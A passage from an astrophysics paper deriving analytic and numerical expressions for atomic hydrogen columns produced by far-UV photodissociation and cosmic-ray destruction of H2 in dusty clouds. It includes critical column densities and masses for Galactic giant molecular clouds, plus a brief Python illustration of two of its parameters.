BS16 for _dusty_ clouds, to also include cosmic-ray removal of the H\({}_{2}\) and the associated production of residual HI in the extended molecular cloud interiors. This in addition to direct photodissociation in the cloud surface PDRs. In SS2.1 and 2.2 we write down our basic HI/H\({}_{2}\) formation-destruction equation that includes a term for cosmic-ray removal of H\({}_{2}\) and the associated production of HI. We define the basic physical quantities and dimensionless parameters in the problem, \(\alpha\), \(\beta\), \(\tilde{\sigma}_{g}\), and \(G\). We derive analytic expressions for the growth of the HI column density, from the outer PDR into the shielded cosmic-ray zone (CRZ), as a function of the gas density, far-UV field intensity, cosmic-ray ionization rate, and dust-to-gas ratio. In SS2.3 we develop a formula for the critical cloud depths at which cosmic-rays dominate the the HI columns. In SS2.4 we apply our formula to Galactic giant molecular clouds (GMCs) to assess whether cosmic rays can be significant contributors to HI columns in GMCs including their PDRs. 
In SS3 we present numerical computations for the HI and H\({}_{2}\) abundance profiles and HI columns densities for a wide range of parameter combinations of the FUV intensity, cosmic-ray ionization rate, and gas density. We present results with and without the inclusion of a model for attenuation of the cosmic-ray fluxes. We also show how the profiles scale with the assumed dust-to-gas ratio. We discuss the effects of cosmic-ray ionization on the locations of the HI-to-H\({}_{2}\) transition points in the Appendix. We summarize in SS4. ## 2 Theory ### Formation-Destruction Equation We consider an idealized one-dimensional semi-infinite cloud in slab geometry exposed on one side to beamed (normally incident) far-ultraviolet radiation, in combination with a flux of penetrating cosmic ray particles. In dusty systems the formation-destruction equation for the steady-state HI and H\({}_{2}\) fractions at any cloud depth is \[Rnx_{\rm HI}~{}=~{}[\frac{1}{2}D_{0}f(N_{\rm H_{2}})e^{-\tau_{\rm dust}}~{}+~{ }\phi\zeta\frac{s(N)}{C}]x_{\rm H_{2}} \tag{1}\] where \(x_{\rm HI}\equiv n_{\rm HI}/n\) is the atomic (HI) fraction, \(x_{\rm H_{2}}\equiv n_{\rm H_{2}}/n\) is the molecular (H\({}_{2}\)) fraction, and \(n_{\rm HI}\), \(n_{\rm H_{2}}\), and \(n\), are the atomic, molecular, and total hydrogen gas densities (cm\({}^{-3}\)). Particle conservation is \[x_{\rm HI}+2x_{\rm H_{2}}=1~{}~{}~{}, \tag{2}\] where we assume that the abundances of hydrogen species other than HI or H\({}_{2}\) are negligibly small1. Footnote 1: See for example Fig. 10 in Bialy & Sternberg (2015) or Fig. 6 in Sternberg et al. (2021). The lefthand side of Eq. (1) is the H\({}_{2}\) formation rate (s\({}^{-1}\)), where \[R\equiv 3\times 10^{-17}~{}\tilde{\sigma}_{g}~{}T_{2}^{1/2}~{}~{}~{}~{}~{}{ \rm cm}^{3}~{}{\rm s}^{-1} \tag{3}\] is the grain-surface H\({}_{2}\) formation rate coefficient, \(T_{2}\equiv T/(100\) K) where \(T\) is the gas temperature (K), and \(\tilde{\sigma}_{g}\) is the dust-to-gas ratio normalized to the standard Galactic ISM dust-to-gas mass ratio of 1:100 for which \(\tilde{\sigma}_{g}\)=1 (Bohlin et al., 1978; Remy-Ruyer et al., 2014). The righthand side of Eq. (1), is the H\({}_{2}\) destruction rate by Lyman-Werner band photodissociation (LW: 912-1108 A) in the PDR, and by cosmic-ray impact in the CRZ. In the first term, \[D_{0}\equiv 5.8\times 10^{-11}~{}I_{\rm UV}~{}~{}~{}~{}~{}{\rm s}^{-1}\] is the unattenuated free-space rate (Sternberg et al., 2014; Heays et al., 2017) for LW band photodissociation, \[\mathrm{H_{2}}\ +\ \nu_{\mathrm{LW}}\ \rightarrow\ \mathrm{H}\ +\ \mathrm{H}\quad, \tag{4}\] where \(I_{\mathrm{UV}}\) is the far ultraviolet (6-13.6 eV) intensity relative to the Draine (1978) representation for the interstellar radiation field in the Solar neighborhood (\(I_{\mathrm{UV}}=1\)). The factor of 1/2 accounts for the reduction of the photodissociation rate at the cloud surface due to the presence of the optically thick slab itself. The FUV and photodissociation rate are attenuated by a combination of dust absorption, and \(\mathrm{H_{2}}\) self-shielding as the LW absorption lines become optically thick. The exponential term in Eq. (1) accounts for the dust attenuation. 
The LW band dust optical depth \[\tau_{\mathrm{dust}}\equiv\sigma_{g}(N_{\mathrm{HI}}+2N_{\mathrm{H_{2}}}) \tag{5}\] where \(N=N_{\mathrm{HI}}+2N_{\mathrm{H_{2}}}\) is the total (atomic plus molecular) hydrogen column density from the cloud surface, and \[\sigma_{g}\equiv 1.9\times 10^{-21}\ \tilde{\sigma}_{g}\quad\ \ \mathrm{cm^{2}} \tag{6}\] is the dust absorption cross section per hydrogen nucleus. Here \(\tilde{\sigma}_{g}\) is the same dust-to-gas ratio appearing in Eq. (3). This parameter can also be viewed as the normalized dust absorption cross section. I.e., we are assuming that the \(\mathrm{H_{2}}\) formation rate coefficient (Eq. [3]) and the dust absorption cross section (Eq. [6]) scale identically with the overall dust abundance. The \(\mathrm{H_{2}}\) self-shielding function \[f(N_{\mathrm{H_{2}}})\equiv\frac{1}{\sigma_{d}}\frac{dW_{d}(N_{\mathrm{H_{2}} })}{dN_{\mathrm{H_{2}}}} \tag{7}\] where \(W_{d}(N_{\mathrm{H_{2}}})\) (\(\mathrm{H_{2}}\)) is the multi-line curve of growth for the \(\mathrm{H_{2}}\) dissociation bandwidth, and \(\sigma_{d}=2.36\times 10^{-3}\ \mathrm{cm^{2}}\) Hz is the total \(\mathrm{H_{2}}\) dissociation cross section (see S14 for a detailed discussion of these quantities). We use the Draine and Bertoldi (1996) formula, as verified by S14, for the self-shielding function. At the cloud surface, \(N_{\mathrm{H_{2}}}=0\) and \(f=1\). For \(N_{\mathrm{H_{2}}}\gtrsim 10^{14}\ \mathrm{cm^{-2}}\), the Doppler cores become optically thick and \(f\) becomes small. For \(N_{\mathrm{H_{2}}}\gtrsim 10^{22}\ \mathrm{cm^{-2}}\) the Lorentzian wings of the LW absorption lines overlap, and\(f\to 0\). In the second term in Eq. (1), \(\phi\varsigma s(N)\) is the local destruction rate of the \(\mathrm{H_{2}}\) by the cosmic rays. Here, \[\zeta=1.0\times 10^{-16}\ \zeta_{-16}\quad\ \ \mathrm{s^{-1}} \tag{8}\] is the unattenuated free-space rate of \(\mathrm{H_{2}}\) ionization by cosmic-ray impact \[\mathrm{H_{2}}\ +\ \mathrm{cr}\ \rightarrow\ \mathrm{H_{2}^{+}}\ +\ \mathrm{e}\quad. \tag{9}\] This includes ionization by the primary cosmic-rays and the secondary energetic electrons. The parameter \(\phi\), of order unity, is the number of \(\mathrm{H_{2}}\) destruction events per cosmic-ray ionization. The \(\mathrm{H_{2}}\) destruction processes include ion-molecule chemical reactions driven by the initiating cosmic-ray ionizations, as well as direct cosmic-ray dissociation of the \(\mathrm{H_{2}}\). In a steady-state, the hydrogen gas is primarily a mixture of HI and \(\mathrm{H_{2}}\), and for a predominantly molecular medium \(\phi\approx 2\)(Bialy and Sternberg, 2015; Sternberg et al., 2021). The factor \(C\) in the second term accounts for possibly different \(\mathrm{H_{2}}\) formation rates in the CRZs compared to the PDRs due to density and temperature gradients, as well as additional gas clumping in the CRZs. Differing formation rates imply \[C\ =\ \frac{(nT^{1/2})_{\mathrm{CRZ}}}{(nT^{1/2})_{\mathrm{PDR}}}\quad. \tag{10}\] For pressure equilibrium this then gives, \[C\ =\ \left(\frac{n_{\mathrm{CRZ}}}{n_{\mathrm{PDR}}}\right)^{1/2}\ =\ \left(\frac{T_{\mathrm{ CRZ}}}{T_{\mathrm{PDR}}}\right)^{-1/2}\quad. \tag{11}\] For example, \(C\approx\sqrt{5}\) for pressure equilibrium between a FUV heated PDR with \(T\approx 100\) K, and a cosmic-ray heated CRZ with \(T\approx 20\) K. \(C\) can be increased further if there is any gas clumping. 
The function \(s(N)\) accounts for the possible attenuation of the cosmic-ray energy densities with cloud depth, and reduction of the associated \(\mathrm{H_{2}}\) ionization rates (Neufeld and Wolfire, 2017; Padovani et al., 2018; Sternberg et al., 2021). However, the intrinsic energy spectra of the low-energy cosmic rays are uncertain, as are the transport mechanisms, e.g. free-streaming along magnetic field lines, or diffusive pitch-angle scattering off of pre-existing or self-generated MHD waves (Zweibel, 2013; Padovani et al., 2020; Kempski and Quataert, 2022). In our computations we either exclude cosmic-ray attenuation entirely (and set \(s=1\)) or adopt a simple representative form for the cosmic-ray attenuation function. As in Sternberg et al. (2021), when including cosmic-ray attenuation we adopt the Padovani et al. (2018) broken power-law model \[s(N)=\begin{cases}1&N_{\mathrm{eff}}<N_{\mathrm{cr}}\\ \\ (N_{\mathrm{eff}}/N_{\mathrm{cr}})^{-a}&N_{\mathrm{eff}}>N_{\mathrm{cr}}\quad. \end{cases} \tag{12}\] Here \(N_{\mathrm{eff}}\equiv N/\mathrm{cos}\theta\) is the effective absorbing gas column density, where \(\theta\) is the angle of the magnetic field along which the cosmic-rays propagate relative to the cloud normal, and \(N_{\mathrm{cr}}\) is the attenuation scale column. We use "model \(\mathcal{H}\)" of Padovani et al. (2018) for which \(a=0.385\), and \(N_{\rm cr}=10^{19}\) cm\({}^{-2}\), and set \(\cos\!\theta=1\). This model is in agreement with observed declines of the cosmic-ray ionization rates with increasing cloud column densities (Caselli et al., 1998; Indriolo and McCall, 2012; Neufeld and Wolfire, 2017). See Fig. C1 in Padovani et al. (2022) for the full observational compilation. The power-law in Eq. (12) is valid for \(N_{\rm eff}\) between \(10^{19}\) and \(10^{24}\) cm\({}^{-2}\). For \(N_{\rm eff}<10^{19}\) cm\({}^{-2}\), \(s=1\), and divergence is avoided at small columns. Our basic question is: when (if ever) does internal cosmic-ray production of HI compete with photodissociation in the build-up of HI column densities in interstellar clouds? We are particularly interested in optically thick clouds consisting of fully developed outer photodissociation regions (PDRs) surrounding inner cosmic-ray dominated zones (CRZs). We are interested in the total HI columns, irrespective of the temperature- and depth-dependent line widths of the associated 21 cm signatures. ### Ode For our 1D geometry, the atomic to molecular density ratio \(x_{\rm HI}/x_{\rm H_{2}}\equiv dN_{\rm HI}/dN_{\rm H_{2}}\), and Eq. (1) can be written as the ordinary differential equation (ODE) \[\frac{dN_{\rm HI}}{dN_{\rm H_{2}}}\ =\ \frac{1}{2}\alpha f(N_{\rm H_{2}})e^{- \sigma_{g}N}\ +\ \beta s(N)\quad. \tag{13}\] In this equation the independent variable is \(N_{\rm H_{2}}\) (with \(N=N_{\rm HI}+2N_{\rm H_{2}}\)) and the initial condition is \(N_{\rm HI}(0)=0\). The parameters \[\alpha\equiv\frac{D_{0}}{Rn}\ =\ 1.9\times 10^{4}\ \frac{I_{\rm UV}}{\bar{ \sigma}_{g}n_{2}}T_{2}^{-1/2}\quad, \tag{14}\] and \[\beta\equiv\frac{\phi\zeta}{RnC}\ =\ 6.7\times 10^{-2}\ \frac{\zeta_{-16}}{ \bar{\sigma}_{g}n_{2}C}T_{2}^{-1/2}\quad, \tag{15}\] where \(n_{2}\equiv n/(100\ {\rm cm}^{-3})\). Here and henceforth we assume \(\phi=2\). The parameter \(\alpha\) is the ratio of the unshielded free-space H\({}_{2}\) photodissociation rate to the molecular formation rate, and \(\beta\) is the ratio of the unattenuated cosmic-ray destruction rate to the molecular formation rate. 
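The numerical coefficients above make \(\alpha\) and \(\beta\) easy to evaluate for any combination of cloud parameters. The short Python sketch below is our own illustration (not code from this paper) of Eqs. (14) and (15); the defaults \(C=\sqrt{5}\) and \(\phi=2\) follow the choices quoted in the text.

```python
import numpy as np

def alpha(I_UV, n2, sigma_g_tilde=1.0, T2=1.0):
    """Eq. (14): free-space photodissociation rate over the H2 formation rate."""
    return 1.9e4 * I_UV / (sigma_g_tilde * n2 * np.sqrt(T2))

def beta(zeta_16, n2, C=np.sqrt(5.0), sigma_g_tilde=1.0, T2=1.0):
    """Eq. (15): free-space cosmic-ray destruction rate over the H2 formation rate (phi = 2)."""
    return 6.7e-2 * zeta_16 / (sigma_g_tilde * n2 * C * np.sqrt(T2))

# Fiducial Galactic values quoted in the text:
print(alpha(I_UV=1.0, n2=1.0))     # ~1.9e4
print(beta(zeta_16=1.0, n2=1.0))   # ~3.0e-2 for C = sqrt(5)
```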
For characteristic interstellar conditions \(I_{\rm UV}\approx 1\), and \(\alpha\approx 1.9\times 10^{4}\) for a cold gas density \(n_{2}=1\). The parameter \(\alpha\) remains large even for \(n_{2}\gg 1\), especially near regions of active star-formation where the FUV field intensity \(I_{\rm UV}\gg 1\). At the cloud edge the H\({}_{2}\) is almost fully dissociated and the molecular fraction \[x_{\rm H_{2}}\ \approx\ \frac{2}{\alpha}\ =\ 1.1\times 10^{-4}\tilde{\sigma}_{ g}T_{2}^{1/2}\frac{n_{2}}{I_{\rm UV}}\quad. \tag{16}\] The molecular fraction grows as the FUV is attenuated with increasing cloud depth. The Galactic cosmic-ray ionization rate also varies depending on location, with values approaching \(10^{-15}\) s\({}^{-1}\) in diffuse gas down to \(\sim 10^{-17}\) s\({}^{-1}\) in dense clouds (e.g. Caselli et al., 1998; Indriolo and McCall, 2012). See also the observational summary in Fig. C1 in Padovani et al. (2022). Some of this variation may be indicative of attenuation of the cosmic-ray fluxes as they traverse the clouds (Neufeld and Wolfire, 2017). Here we adopt \(\zeta_{-16}=1\) as a global characteristic value for the Galactic free-space cosmic-ray ionization rate. With \(\zeta_{-16}=n_{2}=T_{2}=\tilde{\sigma}_{g}=1\), and with \(C=\sqrt{5}\) for the CRZ, \(\beta=3.0\times 10^{-2}\). The cosmic-ray ionization rates may be substantially larger in clouds near supernova remnants (Indriolo et al., 2010; Ceccarelli et al., 2011; Schuppan et al., 2012). In most ISM environments \(\alpha\gg 1\) and \(\beta\lesssim 1\). For constant \(Rn\) (independent of cloud depth) \(\alpha\) is the maximal atomic to molecular density ratio at the fully photodissociated cloud edge, and \(\beta\) is the minimal atomic to molecular ratio in the optically thick cosmic-ray dominated interior (in the absence of CR attenuation). Complete atomic to molecular transitions are expected as the clouds become sufficiently optically thick. Given the solution to Eq. (13) for \(N_{\rm HI}(N_{\rm H_{2}})\), and with \(N\equiv N_{\rm HI}(N_{\rm H_{2}})+2N_{\rm H_{2}}\) we obtain profiles for the HI column, \(N_{\rm HI}\), and the derivatives, \(x_{\rm HI}\) and \(x_{\rm H_{2}}\), as functions of \(N\). In SS3 we present such profiles computed numerically, but we first discuss several analytic solutions, as follows. #### 2.2.1 No CR attenuation In the absence of any CR attenuation, with \(s\equiv 1\) everywhere, and for any \(\beta\), the HI fraction in the CRZ is, \[x_{\rm HI,CRZ}\ =\ \frac{\beta}{2+\beta}\quad. \tag{17}\] The atomic fraction \(x_{\rm HI}=1/2\) for \(\beta=2\). For a predominantly molecular CRZ, i.e. for \(\beta\ll 1\), the residual HI density is \[n_{\rm HI,CRZ}\ \approx\ \frac{\beta}{2}\ n_{\rm CRZ}\ =\ 3.33\times T_{2,\rm CRZ }^{-1/2}\ \tilde{\sigma}_{g}^{-1}\zeta_{-16}\quad\quad{\rm cm}^{-3} \tag{18}\] _independent_ of the total cloud density at any point (see also Solomon and Werner, 1971; Li and Goldsmith, 2003). For example, for \(\zeta_{-16}=\tilde{\sigma}_{g}=1\), and a CRZ temperature \(T_{2,\rm CRZ}=0.2\), the HI density in the CRZ is \(n_{\rm HI,CRZ}=7.4\) cm\({}^{-3}\). For \(\beta\lesssim 1\), and with \(s\equiv 1\), an excellent approximate analytic solution to Eq. (13) is \[N_{\rm HI}(N_{\rm H_{2}})\ \approx\ \frac{1}{\sigma_{g}}{\rm ln}\big{[}\frac{ \alpha}{2}G(N_{\rm H_{2}};\sigma_{g})+1\big{]}\,+\,\beta N_{\rm H_{2}}\ . 
\tag{19}\] The first term on the right is the HI column built up by photodissociation, and the second term is the HI due to cosmic-rays, both as functions of the molecular column \(N_{\rm H_{2}}\). In this expression, \[\begin{split} G(N_{\rm H_{2}};\sigma_{g})\ \equiv&\ \sigma_{g}\int_{0}^{N_{\rm H_{2}}}f(N^{\prime}_{\rm H_{2}})\ {\rm e}^{-2\sigma_{g}N^{\prime}_{\rm H_{2}}}\ dN^{\prime}_{\rm H_{2}}\\ &=\ \frac{\sigma_{g}}{\sigma_{d}}W_{g}(N_{\rm H_{2}};\sigma_{g})\end{split} \tag{20}\] where \(W_{g}(N_{\rm H_{2}};\sigma_{g})\) is the (universal) H\({}_{2}\)-dust limited curve of growth for the LW dissociation bandwidth (see S14 for a detailed discussion). For any \(\sigma_{g}\), \(W_{g}\) is a preexisting function of \(N_{\rm H_{2}}\), independent of the cloud parameters \(I_{\rm UV}\) or \(n\). We use the analytic form for \(W_{g}\) given by BS16 (their Eq. [27]). When all of the LW radiation is absorbed the integral converges to a constant, \[G\ \equiv\ \frac{\sigma_{g}}{\sigma_{d}}W_{g,\rm tot}(\sigma_{g})\ \approx\ 3.0\!\times\!10^{-5}\ \tilde{\sigma}_{g}\!\left(\frac{9.9}{1+8.9\tilde{\sigma}_{g}}\right)^{0.37}. \tag{21}\] Here, \(W_{g,\rm tot}(\sigma_{g})\) is the total dust-limited dissociation bandwidth (Hz), and \(G\) is then the (dimensionless) average H\({}_{2}\) self-shielding factor within an H\({}_{2}\)-dust absorption column. The righthand side of Eq. (21) is our BS16 fitting formula for \(G\) based on the multi-line (_Meudon_) PDR model computations we presented in S14. At cloud depths beyond which all of the LW radiation is absorbed, Eq. (19) becomes \[N_{\rm HI,\it t}\ \approx\ \frac{1}{\sigma_{g}}\!\ln\!\big{[}\frac{\alpha G}{2} +1\big{]}\ +\ \frac{\beta}{2+\beta}N\quad, \tag{22}\] where the basic dimensionless parameter \[\alpha G\ =\ \frac{DG}{Rn}\ =\ 0.59\ \frac{I_{\rm UV}}{n_{2}}T_{2}^{-1/2} \times\left(\frac{9.9}{1+8.9\tilde{\sigma}_{g}}\right)^{0.37}. \tag{23}\] The subscript \(t\) refers to optically thick. The first term in Eq. (22) is the total (asymptotic) HI column density produced by just photodissociation in optically thick PDRs, \[N_{\rm HI,PDR}\ \equiv\ \frac{1}{\sigma_{g}}\!\ln\!\left[\frac{\alpha G}{2}+1 \right]\quad. \tag{24}\] This is the formula for the total HI column density for beamed FUV fields derived by S14 in the absence of cosmic rays (i.e., for \(\beta=0\)). The second term in Eq. (22) \[N_{\rm HI,CRZ}\ \equiv\ \frac{\beta}{2+\beta}N \tag{25}\] is the additional HI column produced by the cosmic-rays, and it grows arbitrarily large with \(N\) unless the cosmic-ray ionization rate is sufficiently attenuated. In this term we have used the relation \(N_{\rm H_{2}}=N/(2+\beta)\) for the CRZ in replacing \(N_{\rm H_{2}}\) with \(N\) in Eq. (19). Differentiation2 shows that Eq. (19) is a good (but formally approximate) solution to Eq. (13) so long as \(\beta\sigma_{g}N_{\rm H_{2}}\) is everywhere negligible compared to either \(\sigma_{g}N_{\rm HI}\) or \(2\sigma_{g}N_{\rm H_{2}}\). The latter two quantities are the HI-dust and H\({}_{2}\)-dust optical depths associated with the HI and H\({}_{2}\) columns respectively. Thus, if \(\beta=0\), i.e. with no cosmic-rays, Eqs. (19) and (22) are exact. But Eq. (19) remains accurate, so long as \(\beta<1\). We verify this in SS3 by integrating Eq. (13) numerically and comparing to our analytic formulae. Footnote 2: Differentiating Eq. (19) gives \(\tau_{\rm dust}=\sigma_{g}(N_{\rm HI}+(2-\beta)N_{\rm H_{2}})\), rather than Eq. (5), for any \(N_{\rm H_{2}}\). 
For \(\beta<1\) the spurious term does not contribute significantly to the absorption of the FUV, and the shapes of the HI-to-H\({}_{2}\) profiles are unaffected. #### 2.2.2 With CR attenuation When CR attenuation is included, the HI fraction in the CRZ decreases with cloud depth as \[x_{\rm HI,CRZ}\ =\ \frac{\beta s(N)}{2+\beta s(N)}\ \approx\ \frac{1}{2}\beta s (N)\quad. \tag{26}\] CR attenuation reduces the HI that is built up in the CRZs. Our analytic approximation for \(N_{\rm HI,\it t}\) can be generalized for arbitrary cosmic-ray attenuation functions, \(s(N)\), by making the replacement \[\frac{\beta}{2+\beta}N\ \to\ \frac{\beta}{2+\beta}\int_{0}^{N}s(N^{ \prime})dN^{\prime}\] \[=\frac{\beta}{2+\beta}\times\begin{cases}N&N<N_{\rm cr}\\ \\ N_{\rm cr}+\frac{N_{\rm cr}}{1-a}\Big{[}\big{(}N/N_{\rm cr}\big{)}^{1-a}-1 \Big{]}&N>N_{\rm cr}\end{cases} \tag{27}\] for the second term in Eq. (22). In the second line we have evaluated the integral assuming the attenuation function given by Eq. (12) with \(\cos\!\theta=1\). ### Critical Cloud Columns The two terms on the righthand side of Eq. (22) are equal at the critical gas column, \(N=N_{\rm crit}\), at which the cosmic rays start to dominate the growth of the HI column. Thus, for unattenuated cosmic-rays (\(s\equiv 1\)), \[N_{\rm crit}\ =\ \frac{1}{\sigma_{g}}\,\frac{(2+\beta)}{\beta}\,\ln[\alpha G/2+1]\quad. \tag{28}\] Multiplying through by \(\sigma_{g}\) gives the critical dust opacity, \[\tau_{\rm dust,crit}\ =\ \frac{(2+\beta)}{\beta}\,\ln[\alpha G/2+1]\quad, \tag{29}\] which depends on just the two (dimensionless) parameters \(\alpha G\) and \(\beta\). At a gas column \(N\) (or dust opacity \(\tau_{\rm dust}\)), cosmic-rays dominate the production of the HI if \(N>N_{\rm crit}\) (or if \(\tau_{\rm dust}>\tau_{\rm dust,crit}\)), otherwise photodissociation dominates. In the weak-field limit, \(\alpha G/2\ll 1\) (and assuming \(\beta\lesssim 1\)), we have3 Footnote 3: For \(G\) in the evaluation of Eq.(30) we have dropped the term \([9.9/(1+8.9\bar{\sigma}_{g})]^{0.37}\), which varies by a factor of 4.2 for \(\tilde{\sigma}_{g}\) between 0.1 and 10. \[N_{\rm crit,\,{\it w}}\;\approx\;\frac{1}{\sigma_{g}}\frac{\alpha G}{\beta}\; \approx\;4.6\times 10^{21}\;\frac{I_{\rm UV}}{\zeta_{-16}}C\;\;\;\;\;{\rm cm}^{- 2}\;. \tag{30}\] In this limit most of the HI produced by photodissociation is built up past the HI-to-H\({}_{2}\) transition point in gas that is primarily molecular (as shown in Fig. 2 in SS 3, see also Appendix). When cosmic-rays are added the CRZs and PDRs overlap, and the critical column is a measure of the relative HI production efficiency by photodissociation versus cosmic-ray ionization in the molecular gas. The critical column is therefore proportional to \(I_{\rm UV}/\zeta_{-16}\), independent of the cloud density \(n\) and/or H\({}_{2}\) formation rate. In the strong-field limit, \(\alpha G\gg 1\) (and again for \(\beta\lesssim 1\)), \[N_{\rm crit,\,{\it s}}\;\approx\;\frac{1}{\sigma_{g}}\frac{2\;{\rm ln}[\alpha G /2]}{\beta}\;=\;1.6\times 10^{22}\;\frac{n_{2}T_{2}^{1/2}C}{\zeta_{-16}} \mathcal{O}(1)\;\;{\rm cm}^{-2}. \tag{31}\] For strong fields the photodissociated HI columns are built up in a (self-limited) fully atomic outer layer, and are only weakly (logarithmically) dependent on \(I_{\rm UV}\). The cosmic-ray contributions to the HI occur in the inner fully optically thick regions where the atomic fractions are proportional to \(\beta\). 
The critical gas column is therefore proportional to the ratio of the H\({}_{2}\) formation rate to ionization rate, or to the density to ionization rate for a given temperature, and the logarithmic factor of order unity. In both the weak- and strong-field limits the critical columns are independent of the dust-to-gas ratio \(\tilde{\sigma}_{g}\). The intermediate case, \(\alpha G/2\approx 1\), is also important, because for a narrow range around this UV to gas density ratio (\(I_{\rm UV}/n_{2}\approx 3\)) a two-phased (WNM/CNM) thermal equilibrium is possible for fully atomic (HI) gas (Wolfire et al., 2003; Krumholz et al., 2008; Bialy & Sternberg, 2019, S14). The range for two-phased equilibria is \(\alpha G\sim 1\) to 4, weakly dependent on metallicity. Star-forming gas and associated HI in the Milky Way and other galaxies may be self-regulated to be in a multi-phased state (Ostriker et al., 2010). For such systems, the critical column is then \[N_{\rm crit,CNM}\;=\;\frac{1}{\sigma_{g}}\frac{2\;{\rm ln}(2)}{\beta}\;=\;1.1 \times 10^{22}\;\frac{n_{2}T_{2}^{1/2}C}{\zeta_{-16}}\;\;\;\;\;{\rm cm}^{-2}\;. \tag{32}\] Here we are assuming that heating in the fully dissociated HI layers is via FUV photoelectric emission with negligible energy input by the cosmic-rays so that the thermal phase structure for the HI is primarily dependent on \(\alpha G\), i.e. on the ratio \(I_{\rm UV}/n\)(Wolfire et al., 2003; Bialy & Sternberg, 2019). ### Giant Molecular Clouds Our expressions for the critical cloud columns are for one-sided illumination by a beamed (normally incident) FUV field, e.g. for a cloud irradiated by a nearby hot star. In the ambient medium two-sided irradiation by the background FUV field is more appropriate, and the critical columns are then doubled for a given cosmic-ray ionization rate. Furthermore, the irradiation may be isotropic rather than beamed. For example, for a Galactic giant molecular cloud (GMC) embedded within ambient photodissociated HI containing a two-phased mixture of CNM and WNM the two-sided intermediate case \(\alpha G=2\) applies. Galactic GMCs have characteristic hydrogen column densities \(N_{\rm GMC}\sim 1.5\times 10^{22}\) cm\({}^{-2}\)(Solomon et al., 1987; McKee & Ostriker, 2007; Lada & Dame, 2020; Chevance et al., 2022) that are only weakly dependent on the cloud mass, \(M_{\rm GMC}\), over a large range (\(\sim 10\) to near \(10^{7}\) M\({}_{\odot}\)) implying a mass-radius relation that scales approximately as \(M\sim R^{2}\)(Larson, 1981). With the extra factor of 2 for two-sided illumination, and for beamed fields, it follows from Eq. (32) that the GMCs are just critical for \[\beta\;=\;\frac{0.1}{\tilde{\sigma}_{g}}\times\left(\frac{N_{22,\rm GMC}}{1.5} \right)^{-1}\;\;\;, \tag{33}\] or \[\frac{\zeta_{-16}}{n_{2}}\;=\;1.5\;T_{2}^{1/2}\times C\,\left(\frac{N_{22,\rm GMC }}{1.5}\right)^{-1}\;\;\;, \tag{34}\] independent of \(\tilde{\sigma}_{g}\). Here \(N_{22,\rm GMC}\equiv N_{\rm GMC}/(10^{22}{\rm cm}^{-2})\). Thus, critical GMCs are molecular even without any CR attenuation, and for these \(x_{\rm HI}\approx 0.05\). For a spherical cloud, the average hydrogen density is \[\bar{n}_{2,\rm GMC}\;=\;0.83\;\left(\frac{\langle N_{22,\rm GMC}\rangle}{1.5} \right)^{3/2}M_{6,\rm GMC}^{-1/2}\;\;\;, \tag{35}\] where \(\bar{n}_{2,\rm GMC}\equiv\bar{n}_{\rm GMC}/(100\;{\rm cm}^{-3})\), \(\langle N_{\rm GMC}\rangle\equiv M_{\rm GMC}/\mu\pi R^{2}\) is the mean cloud column, and \(M_{6,\rm GMC}\equiv M_{\rm GMC}/(10^{6}{\rm M}_{\odot})\). 
The mean mass per particle \(\mu=2.34\times 10^{-24}\) g. For spherical systems irradiation by ambient isotropic FUV fields is the more natural configuration (e.g., McKee & Krumholz, 2010). As discussed by S14 the HI column produced by photodissociation on one side of a plane-parallel slab exposed to isotropic4 radiation is Footnote 4: For a given H\({}_{2}\) photodissociation rate at the cloud surface, the incident radiation flux for isotropic fields is equal to half that for beamed fields, and \(\alpha G\) is divided by 4 rather than 2 in Eq. (36). The factor \(\langle\mu\rangle=0.8\) is an angular average. See S14 for a detailed discussion. \[N_{\rm HI,PDR,i}\ =\ \frac{\langle\mu\rangle}{\sigma_{g}}{\rm ln}\Big{[}\frac{1}{\langle\mu\rangle}\frac{\alpha G}{4}+1\Big{]}\quad, \tag{36}\] where in this expression \(\langle\mu\rangle=0.8\). (The subscript \(i\) refers to isotropic.) For a sphere, for which the PDR is a thin shell surrounding a CRZ core, the mean PDR HI column is \[\langle N_{\rm HI,PDR,i}\rangle\ =\ \frac{4\pi R^{2}\times N_{\rm HI,PDR,i}}{\pi R^{2}}\ =\ 4\times N_{\rm HI,PDR,i}\quad. \tag{37}\] The mean CRZ HI column is \[\langle N_{\rm HI,CRZ}\rangle\ =\ \frac{\beta}{2+\beta}\ \langle N\rangle \tag{38}\] where \(\langle N\rangle\) is the mean cloud column density. The critical mean column for a spherical cloud in an isotropic FUV field, and without CR attenuation, is then given by \[\langle N\rangle_{\rm crit}\ =\ \frac{2+\beta}{\beta}\times\frac{4\langle\mu\rangle}{\sigma_{g}}{\rm ln}\Big{[}\frac{1}{\langle\mu\rangle}\frac{\alpha G}{4}+1\Big{]}\quad. \tag{39}\] This expression is analogous to Eq. (28) with the extra factor of 2 for two-sided beamed illumination of a slab. The critical \(\beta\) is hardly altered in switching from two-sided beamed slabs to isotropically illuminated spheres. For example, for \(\alpha G=2\), the critical \(\beta\) increases by just \(\sim 10\%\) for spheres. Eqs. (33) and (34) are therefore unaltered for spheres, but with \(N_{\rm 22,GMC}\) understood as the mean GMC column, as in Eq. (35). Setting \(\bar{n}_{\rm 2,GMC}T_{\rm 2,GMC}^{1/2}=n_{2}T_{2}^{1/2}C\) in Eq. (34), and with Eq. (35), we obtain the critical mass \[M_{\rm 6,GMC,crit}\ =\ 1.5\ \frac{T_{\rm 2,GMC}}{\zeta_{-16}^{2}}\ \Big{(}\frac{N_{\rm 22,GMC}}{1.5}\Big{)} \tag{40}\] below which the GMCs are FUV dominated, and above which they are cosmic-ray dominated. With any gas clumping inside the GMC, or with the inclusion of CR attenuation, the critical masses will be larger still. It follows from Eq. (40) that for a GMC temperature \(T_{\rm 2,GMC}=0.2\) the critical ionization rate scales as \[\zeta_{-16,{\rm crit}}\ =\ 0.5\times M_{\rm 6,GMC}^{-1/2} \tag{41}\] for a standard \(N_{\rm 22,GMC}=1.5\). More massive GMCs require lower ionization rates to be cosmic-ray dominated because their mean densities are lower. For example, for \(6\times 10^{6}\) M\({}_{\odot}\) near to the upper end of the Galactic GMC mass distribution (Williams & McKee, 1997), \(\zeta_{-16,{\rm crit}}\approx 2\times 10^{-17}\) s\({}^{-1}\). For a more typical GMC mass of \(10^{4}\) M\({}_{\odot}\), the critical ionization rate is \(5\times 10^{-16}\) s\({}^{-1}\). Relaxing the multiphase requirement, and deriving instead the critical column using Eq. 
